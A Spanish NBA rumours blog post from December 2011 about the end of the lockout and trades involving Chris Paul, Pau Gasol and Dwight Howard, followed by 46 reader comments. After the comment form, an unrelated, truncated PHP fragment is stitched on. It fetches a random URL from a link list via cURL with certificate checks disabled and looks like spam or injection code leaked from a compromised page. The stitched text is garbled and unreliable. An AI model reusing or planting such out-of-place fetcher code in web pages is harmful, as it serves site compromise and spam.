Rumores post-lockout

08 de December de 2011 por TheDeerHunter

Aprovechamos esta semana tan atípica para repasar un poco el panorama ante la inminente apertura de los mercados NBA.

–           La salida de Chris Paul de New Orleans se da prácticamente por segura. Los Hornets han visto que tienen muy difícil captar el talento suficiente como para asegurar su continuidad al final del curso. En buena lógica prefieren no entrar en una planificación equivocada y, de paso, obtener réditos por un jugador que casi seguro iban a perder de todas formas.

A día de hoy hay 2 equipos favoritos en la pelea y parece que no son Lakers. Clippers y Warriors son los que han puesto sobre la mesa una oferta más atractiva. Los Celtics también intentan colarse. Otros nombres que suenan con menos fuerza son Rockets y Hawks.

Las ofertas que se manejan serían:

a)       Clippers: Bledsoe, Aminu, Kaman y una primera del 2012. Gordon y Jordan (por  los que se habían interesado Hornets) se consideran intransferibles.

b)       Warriors: Stephen Curry + Klay Thompson. Oficialmente desmienten lo de Curry.

c)        Lakers: pack Bynum ó Gasol + Odom. Aunque se intuye que estaría supeditada a lo que pase en el otro frente abierto y los Hornets prefieren jugadores más jóvenes.

d)       Celtics: Rondo, Avery Bradley y una primera protegida (top10) del 2012… quizás también podrían incluir Glen Davis y/o Jeff Green en la jugada. Pero Paul ha manifestado no desear verse atrapado en una nueva reconstrucción. Por cierto, Marquis Daniels vuelve a Boston.

El jugador sabe que tiene la sartén por el mango y trata de echar más leña al fuego. Ha asegurado que el que le pretenda haría bien en firmar a Tyson Chandler para aumentar probabilidades de quedarse. Los Clippers ya han avisado que ellos no están interesados en comerse ese contrato extra de más de 12 millones/año que pretendería el center. Recordemos que pase lo que pase CP3 estaría en disposición de firmar el año que viene con los Knicks, franquicia por la que el jugador ya ha mostrado preferencia y ellos permanecen a la espera ya que no están en disposición de pujar ahora mismo. Esto supondría que el que logre su fichaje ahora podría quedarse al final compuesto y sin novia.

–           Los Knicks, se mantienen a la sombra y de momento van detrás de perfiles más modestos: Casi atados Kurt Thomas y Carlos Arroyo. A la caza de Grant Hill y quizás Barea.

–           El otro gran protagonista de la semana rumoróloga, Dwight Howard, aún no ha deshojado la margarita. Se intuye que (cómo no) le va el dorado y púrpura y él es el objetivo prioritario de aquellos, pero no depende de él elegir el destino ahora mismo y en Florida no se vive tan mal. En Orlando Magic conservan esperanzas en retenerle (suenan como refuerzos Josh Smith, Iguodala y Monta Ellis… también Battier) aunque son conscientes que en ningún caso habrá extensión de contrato esta campaña. Mientras los Lakers velarán armas fichando a Kapono.

–           A vueltas con la cláusula de amnistía cobra fuerza la opción que ya comentábamos de que los Spurs decidan cortar a Jefferson. En ese caso Caron Butler se deja querer por la franquicia tejana así como en los omnipresentes Clippers y Nets. En esta línea los Blazers han desmentido rotundamente que lo vayan a hacer con Roy, que habría incluso meditado su retirada. Mike Miller siente el punto de mira en su nuca, pero tras una reunión con Riley y Spoelstra lo único que ha podido manifestar es que espera que no le larguen.

–           Más fichajes: Chuck Hayes en Sacramento por $20 kilos en 4 años (mid level). McGrady a Atlanta; Roger Mason a los Wizards…

Seguiremos atentos…

Comenta

46 comentarios a esta entrada

  1. Ru dice:
    #1

    En las últimas horas se dice que pierde fuerza la opción Clippers porque estos no incluyen a Eric Gordon en el pack y porque CP3 no firmará la extensión con ellos,yo como GM de los Hornets,aún no llegando ningún proyecto de estrella,creo que se harían con muy buenos jugadores de futuro,un pívot notable aunque de porcelana pero que es expiring y una ronda prometedora(Wolves 2012,presumiblemente un pick’10).

    Además los Cippers pueden mediante agencia libre hacer con Butler,Prince,Howard…buenos jugadores para el SF,con Paul y Griffin sano equipo PO 100%.

    La opcíon Warrior y Laker me parece escasa por Paul dado que los Hornets necesitan savia nueva y futuro,mientras que la de Boston…tendrían que hacer un traspaso a 3 bandas con Lakers,Rondo de amarillo,CP3 verde y Bynum Hornet…xDDD

      Citar

  2. Ru dice:
    #2

    Battier a los Heat,buen fichaje.

      Citar

  3. melo15 dice:
    #3

    Quien es kurt thomas

      Citar

  4. Cocinitas dice:
    #4

    Eddy Curry tambien apunta a Miami, lo de Battier me parece un gran refuerzo, si consiguen un pivot decente candidatos número 1 al anillo.

      Citar

  5. Vader dice:
    #5

    ¿Y Miami no busca base? ¿Al final se quedan con Chalmers?

    Saludos

      Citar

  6. Cocinitas dice:
    #6

    Le ofrecen los Warriors 60 millones a Chandler por 4 años, cuidado que ahora las posibilidades de un traspaso Paul-Curry. Creo que en estos playoffs van a empezar a caer equipos de la vieja guardia en favor de otros como Clippers o estos Warriors.

      Citar

  7. busky23 dice:
    #7

    Ahora cobra fuerza un traspaso a 3 bandas, Gasol iría a Houston,Kevin Martin y Luis Scola a Hornets y CP3 a L.A.
    Shannon Brown finalmente ficha por Phoenix,1 año,3,5 Kilos,Tayshaun Prince parece q renovara por Detroit,4 años,27 kilos.

      Citar

  8. safd dice:
    #8

    Desde Atlanta a parte de lo de T-Mac hay q resaltar q se habla tb de un S&T de Crawford con bulls q enviaria a Brewer y a Asik a los Hawks

    Un saludo gente q ya llevaba tiempo sin entrar

      Citar

  9. melo15 dice:
    #9

    Estos traspasos de donde los sacais

      Citar

  10. melo15 dice:
    #10

    Estos traspasos de donde los sacais i otra cosa me podeis decir porfavor como puedo ver partidos de la NBA por ejemplo el knicks celtics

      Citar

  11. Cocinitas dice:
    #11

    Muy cerca lo de Gasol con Houston, además Butler jugará en Clippers. En Hoopshype y yahoo sports se habla de los rumores en la NBA. Por cierto ya es oficial el fin del lockout, se ha firmado el convenio por parte de jugadores y propietarios. Habra aquí este año analisis y pronostico de los equipos antes de comenzar la liga???

      Citar

  12. infante dice:
    #12

    pues viendo lo que se avecina, pau va a disponer de un erial en houston bastante majo XD

      Citar

  13. melo15 dice:
    #13

    La idea de cocinitas es buenisima como el año pasado

      Citar

  14. Vader dice:
    #14

    Ojo al movimiento de los Knicks que parece que estan cerca de firmar a Tyson Chandler. Lo cual les daria un juego interior muy equilibrado y seria, en toda regla, una renuncia al model big three…

    La cosa esta muy interesante 😀

    Saludos

      Citar

  15. Vader dice:
    #15

    Y como ya habeis dicho parece que esta hecho el traspaso a tres bandas entre Rockets-Lakers-Hornets. CP3 a los Angeles, Pau y Odom a Houston y Scola, Martin, jovenes y rondas a New Orleans…

      Citar

  16. Jose Luis dice:
    #16

    Pero los salarios Pau + Odom x Paul no cuadran no? La trade machine no me deja hacerlo, alguien más tiene que ir a LA ¿no? se me ocurren ,que encajen, Ariza o Landry… pero no sé quién más…

      Citar

  17. HisRoyalAirness dice:
    #17

    Qué hijos de puta. Sé que esto es la NBA pero los Lakers se olvidan de dónde estaban antes de llegar Pau y de lo que han conseguido con él. Es un detalle feísimo.
    Y Kobe pretendía igualar a Jordan? Si ganas 3 anillos con Shaquille y vas a ganar otros jugando con CP3 y, posiblemente, Howard no eres Jordan ni eres nada.

      Citar

  18. Jose Luis dice:
    #18

    HisRoyalAirness, la NBA es la NBA… cada uno busca lo que cree que es mejor, los jugadores buenos mayores van a equipos mediocres (vale, Pau es muy bueno y no tan mayor, pero se le ha señalado mucho). Se han visto otros traspasos condenando a jugadores, y no sé, me ha parecido un poquito “fuerte” el comienzo de tu mensaje. Me da mucha pena por Pau, pero es así, quizá Rockets consiga algo con agentes libres, si no no sé que hacen tragándose el contratazo de Pau…

      Citar

  19. Vader dice:
    #19

    Kobe Bryant nunca será igual o mejor que Jordan en la vida, ya gane 6 o más anillos… Jordan gano 6 como habria podido ganar 8 o más si hubiera querido y siempre liderando a su equipo. En los 3 primeros anillos de Bryant el jugador referente, franquicia y principal del equipo no era Bryant, era Shaquille O’Neal.

    Todo esto no quita que Bryant sea uno de los grandes de la historia de los Lakers pero por detras de Magic y Kareem en mi opinión… y como he dicho compararlo con Jordan es… ridículo…

    Saludos

      Citar

  20. arvydas dice:
    #20

    Lo que no entiendo es que gana Houston desaciendose de Scola, Dragic y Kevin Martin para recibir solo a Gasol. La temporada pasa en la liga regular Gasol 19-10, Scola 18-8

      Citar

  21. Jose Luis dice:
    #21

    Comparar sólo las estadísticas es tontería, es como si me dices que Bynum es peor que David Lee (que seguramente hizo mejores números, no lo he mirado) o como si me dices que Pau fue peor en la 2009-2010 que David Lee jugando en los Knicks. Lo que no sé es qué hacen comiéndose ese pedazo de contratazo de Pau, soltando buenas piezas… a ver esta semana como va la cosa

      Citar

  22. Vader dice:
    #22

    Bueno los Rockets hace tiempo que iban locos por fichar un jugador franquicia. Pau Gasol ya tiene sus 30-31 años pero igual ya les da para entrar en playoff que es mucho más de lo que tienen ahora…

      Citar

  23. Jose Luis dice:
    #23

    Al final parece que es Okafor el que va a Lakers.

    Lowry-Lee-Budinger-Pau-Nené + Flynn-Terrence Williams-Jordan Hill-Patterson-Thabeet es equipo de play-offs fijo vamos, Daryl Morey es un pedazo de General Manager, no se comería el contrato de Pau si no tiene algo preparado. Con Pau y Nené, tienen un gran mercado latino, aunque pierdan con Scola.

      Citar

  24. Sancho88 dice:
    #24

    A ver si se confirma lo de Nené y bueno, aunque el resto del equipo aparentemente no dice gran cosa, ojito, porque son jóvenes pero tienen calidad. Personalmente, a mí me encanta Courtney Lee. Luego Williams hace absolutamente de todo, aunque tendrá que tener cuidado porque es cabecita loca, Lowry… qué decir, uno de los mejores bases del oeste aunque no tenga mucho nombre entre la afición. Las incógnitas son Flynn y Hill, a ver si de una vez se ponen las pilas y demuestran algo en la liga, porque hasta ahora…

      Citar

  25. Nacho dice:
    #25

    Pues parece que se ha frenado la cosa. La propia NBA presionada por otros equipos ha frenado la cosa. Por favor, si Pau sale de LA que vaya para Orlando. Aunque molan los Rockets, y tener en Texas un duelo Pau/Dirk puede ser la leche.

      Citar

  26. busky23 dice:
    #26

    Una locura lo vivido ayer en el mercado NBA,en especial el tema C. Paul-P.Gasol. Como comenta Nacho parece ser que varios propietarios presionaron a Stern para que desbloqueara un traspaso que ya se daba por hecho al que tachaban de abuso de poder por parte de los Lakers .
    Si después de esto la NBA traspasa a Paul a los Knicks empezaremos a hablar de boicot contra los amarillos y con razón.
    Lo q esta claro es q si los Hornets quieren sacar algo por Paul debe ser traspasado YA,pero este no querrá ir a un equipo donde el no quiera jugar.
    La situación de Gasol ahora es complicada,de momento permanece en el equipo al que ha ayudado y mucho a conseguir triunfos pero sabiendo que no le quieren,que no le perdonan sus flojos Playoffs del curso pasado.
    El ya ha declarado esta mañana en su twitter que va a ser positivo,que remedio le queda….

    Ha todo esto los Clippers parece que van en serio de una vez por todas, Carón Butler me parece un fichajón y de paso deja el camino libre a Rudy en Dallas,a Baron

      Citar

  27. busky23 dice:
    #27

    Davis Cleveland le quiere aplicar la amnistía y quitarselo de encima,apuestan totalmente por Kirye Irving, igual que los Knicks con Billups,aunque a este novias no le van a faltar,Miami?
    Ah,y los Bucks se hacen con Mike Dunleavy,habrá que estar atentos,el mercado no para.

    Y lo mas importante,después de ratificar el convenio jugadores y propietarios,YA ES OFICIAL EL FIN DEL LOCKOUT .

      Citar

  28. nach dice:
    #28

    busky23:
    Lo q esta claro es q si los Hornets quieren sacar algo por Paul debe ser traspasado YA,pero este no querrá ir a un equipo donde el no quiera jugar.

    El tema de Paul es que tiene la sartén por el mango, porque con 1 año de contrato, puede elegir a qué equipo ir. Aunque a mí no me parece tan buen fichaje por sí solo, el tema es si fichan a Howard después, un Paul-Kobe-Howard si que sería un escándalo.

      Citar

  29. Sancho88 dice:
    #29

    Habrá tenido algo que ver la carta de Dan Gilbert a Stern con que Mike Brown sea el entrenador de L.A.? Mente mal pensada la mía. xd. Lo que decís es cierto, si ahora Paul se va a los Knicks sería un agravio comparativo muy grave. Pero realmente era una aberración el traspaso. 40 millones por 20. Era de coña… Y con ese espacio salarial podrían pillarse a Howard y sin pagar el impuesto de lujo. Es decir, un big three dentro del límite salarial. En realidad tenía mucha razón Gilbert. Si ahora Lakers traspasan a Pau por Howard, demostrarán su mierda de escrúpulos con el mejor fichaje de la historia de Lakers (según ellos), el hombre sin el cual sería imposible los últimos dos anillos… en fin.

      Citar

  30. Ru dice:
    #30

    He vivido varios “trade deadline” de locos pero lo de esta noche siguiendo lo de Gasol-Paul & cia ha sido lo más esperpéntico que he visto en mi vida NBA.Que si Odom llorando en un programa de radio,que si el GM de los Hornets es un genio,Gasol peor en los Rockets que en sus primeros Memphis…la “December Madness”,y como dijo CP3 en su twitter:WOW! xD

      Citar

  31. Jose Luis dice:
    #31

    No sé muy bien a que te refieres Sancho, te dejo un link con el traspaso, no son 40 millones por 20 y es imposible que los Lakers no paguen impuesto de lujo (salvo que amnistíen a Kobe jajaja).

    http://espn.go.com/nba/tradeMachine?tradeId=7clbbzx

    Ese es el trade que estaba siendo propuesto 🙂

      Citar

  32. Cocinitas dice:
    #32

    Bueno vamos a analizar el traspaso detenidamente. Lo primero decir que el traspaso esta hecho, pero la NBA lo tiene paralizado debido a las fuertes presiones que esta recibiendo por parte de algunos equipos de la NBA. El traspaso según yahoo sports, y si no he entendido mal seria el siguiente:

    – Los Hornets renuncian a sus renovaciones y absorven el contrato de Lamar Odom, generando una Trade exception de 8,9 millones para los lakers.
    – Pau Gasol iria a los NO Hornets a cambio de Paul y sus contratos se encarecerian un 15% cada uno, generando una trade exception para Lakers de unos 3 millones.
    – Pau Gasol seria nuevamente traspasado, esta vez rumbo a Houston a cambio de Scola, Martin, Dragic la primera ronda de 2012 proveniente de Knicks y una segunda ronda de Rockets, pasando a cobrar un 15% más yendose a los 24 millones anules y pasando a ser uno de los mejores pagados de la NBA.
    – Bien el problema a mi entender radica en que los Lakers tendrian 12,5 kilos para usarlos en traspasos, con lo cual la opción Big Three con Howard estaria muy cerca metiendo en la operación a Bynum y Artest e intentando conseguir un 4 de garantias con esta trade exception en el mercado de libres.
    – La otra opción que se baraja para realizar el traspaso es que Okafor viaje tambien rumbo a Lakers, ya que esto seria visto con mejores ojos por los propietarios de otros equipos desbloqueando así la situación.

      Citar

  33. arivas dice:
    #33

    Yo creo que el trade que dice Jose Luis, el ejemplo que ha puesto con el simulador, es un trade normal sin complicaciones. Yo creo que nadie podria decir nada. (mas alla de las valoraciones de quien gana y pierde, que Houston la verdad que parece que no sale muy bien parado)

    Otra cosa es el lio este que ha explicado Cocinitas que ya se complica con las trade excepcion etc.
    Oye, y eso del 15% en cada traspaso? Joer con Pau 24 milloncejos al año, no está mal. Partidos ganaria pocos en Houston pero millones….

      Citar

  34. Jose Luis dice:
    #34

    Cocinitas, ¿las trade exception pueden usarse en el mercado de agentes libres? creía que solo era en intercambios, pregunto vamos 🙂 me ha sorprendido esa versión

      Citar

  35. Sancho88 dice:
    #35

    Claro, es el jaleo que yo no sabía. Incluían a Okafor en el traspaso. Así está bien. Pero fijaos si finalmente se hubiera ido Pau a Rockets a cambio de Scola, Dragic y Martin… ahí sí que sería 20 millones por 40 no? y con todos mis respetos, no tengo ni idea de las movidas estas de buy exception y todas los conceptos estos raros, pero me cawen la puta nba lo complicada que es analizar los traspasos. Supongo que los que teneis el 2K lo controlaréis mejor, porque yo no me empano de na. xd

      Citar

  36. Ru dice:
    #36

    Yo creo que el traspaso original no incluye a Okafor pero soy de la opinión de que esto se desbloquea metiendo al bueno de Emeka en la operación recalando en Lakers,vamos,que no creo que una vez haya estado todo masticado se cancele definitivamente.Por otro lado pensar que la NBA cancela definitivamente este traspaso.Las opciones para Chris Paul eran:Celtics(enemigos acérrimos de Lakers),Clippers(los vecinos y que se les pueden subir a las barbas) y Warriors…papelón.

      Citar

  37. GreenPride dice:
    #37

    Bueno, vaya jaleo que se ha montado con el intercambio Pau-Paul. Yo creo que Pau+Odom por Paul tampoco es tan beneficioso para los Lakers que se quedarían de golpe sin juego interior, sólo con un Bynum que ya sabemos que es difícil que juegue la temporada completa. Creo que por lo que se quejan los propietarios es por esas trade exceptions que se generarían en favor del equipo de LA que le permitiría contratar a uno de los agentes libres de los buenos (Chandler por ejemplo) para su juego interior o ir a por Howard. Mirado con eso si que se ve un traspaso del todo ventajoso para L.A., mucho más que si sólo miramos Pau+Odom por Paul.
    Veremos en lo que queda y si la NBA finalmente se echa para atrás recordándo que los Hornets son propiedad de la NBA y no tienen dueño. El equipo más perjudicado de todas formas desde mi punto de vista serían los Rockets que recibirían un jugador mayor como Pau cobrando un pastonazo increíble y perdiendo por el camino a Scola, Martin, Dragic y rodas del draft, vamos estos sí que no sé en qué están pensando para hacer este trade.
    Fin del lockout y que interesantes van a ser estos días pre-temporada!!!

      Citar

  38. Cocinitas dice:
    #38

    Jose Luis:
    Cocinitas, ¿las trade exception pueden usarse en el mercado de agentes libres? creía que solo era en intercambios, pregunto vamos me ha sorprendido esa versión

    Me referia a un sign and trade por parte de algun equipo.

      Citar

  39. Cocinitas dice:
    #39

    arivas:
    Yo creo que el trade que dice Jose Luis, el ejemplo que ha puesto con el simulador, es un trade normal sin complicaciones. Yo creo que nadie podria decir nada. (mas alla de las valoraciones de quien gana y pierde, que Houston la verdad que parece que no sale muy bien parado)

    Otra cosa es el lio este que ha explicado Cocinitas que ya se complica con las trade excepcion etc.Oye, y eso del 15% en cada traspaso? Joer con Pau 24 milloncejos al año, no está mal. Partidos ganaria pocos en Houston pero millones…

    Algunos contratos como el Pau o Paul llevan una clausula que en caso de ser traspasados su salario se incrementa automaticamente en un 15% y en este caso seria el doble al ser traspasado dos veces.

      Citar

  40. Ru dice:
    #40

    GreenPride:
    El equipo más perjudicado de todas formas desde mi punto de vista serían los Rockets que recibirían un jugador mayor como Pau cobrando un pastonazo increíble y perdiendo por el camino a Scola, Martin, Dragic y rodas del draft, vamos estos sí que no sé en qué están pensando para hacer este trade.
    Fin del lockout y que interesantes van a ser estos días pre-temporada!!!

    Les habrán prometido el número 1 del draft porque si no ya me dirás…Lowry-Lee-Budinger-Patterson-Gasol?¿Lowry que aunque ha mejorado es un PG sin pausa,Lee que ahora mismo es una incógnita que versión ofrece,si la de especialista defensivo de Magic o la de dejándose llevar de Nets,Budinger que es medianamente potable,buen tirador pero que sobre él no pueden sentarse las bases de una franquicia,Patterson proyecto futuro a muy largo plazo y Gasol que es “el único hombre entre tanto niño”.Todo eso aderezado con un banquillo horrible:Flynn que desde la lesión no ha sido el que prometía ser en sus inicios,Jordan Hill y Thabeet que lo que tenían que hacer es buscarse la vida en Europa…

      Citar

  41. Cocinitas dice:
    #41

    Se especula con otra opción por la cual Pau iria directamente a Houston ahorrandose así 6 millones y quedando 13 millones por debajo del limite salarial con lo cual los Rockets podrian ir a por Nené y juntarlo con Pau, además aún podrian ofrecer la mid level a algun alero. Tambien cabe destacar que los Rockets cuentan con los Rookies Marcus Morris y Donatas Motiejunas.

      Citar

  42. Nacho dice:
    #42

    Pues el equipo que quedaría en New Orleans (si siguen allí) tendría buena pinta. Deberían buscar un base, y si se queda Okafor tendrían un juego interior notable.
    Dragic/TJFord (sigue allí?)
    Kevin Martin
    Ariza
    Odom/Scola
    Scola/Okafor

      Citar

  43. Cocinitas dice:
    #43

    Nacho:
    Pues el equipo que quedaría en New Orleans (si siguen allí) tendría buena pinta. Deberían buscar un base, y si se queda Okafor tendrían un juego interior notable.
    Dragic/TJFord (sigue allí?)
    Kevin Martin
    Ariza
    Odom/Scola
    Scola/Okafor

    No creo que te confundes con Jarret Jack que si sigue alli, además podrian renovar a West no lo olvides.

      Citar

  44. Nacho dice:
    #44

    cierto

      Citar

  45. Denise dice:
    #45

    HisRoyalAirness:
    Sé que esto es la NBA pero los Lakers se olvidan de dónde estaban antes de llegar Pau y de lo que han conseguido con él. Es un detalle feísimo.
    Y Kobe pretendía igualar a Jordan? Si ganas 3 anillos con Shaquille y vas a ganar otros jugando con CP3 y, posiblemente, Howard no eres Jordan ni eres nada.

    La verdad es que los Lakers se están portando muy mal con Pau. Que facil se olvidan las cosas y que facil es cargar contra el mas indefenso (de las estrellas) la responsabilidad de la humillante derrota contra Dallas..

    PD: McGrady retirate ya y deja de humillarte, que al final vamos a recordarte por tus arrastres por el suelo y no por tus temporadones en los Magic..

      Citar

  46. melo15 dice:
    #46

    Roy se retira???
    No me lo puedo creer que pena me da a mi me caia supero bien

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>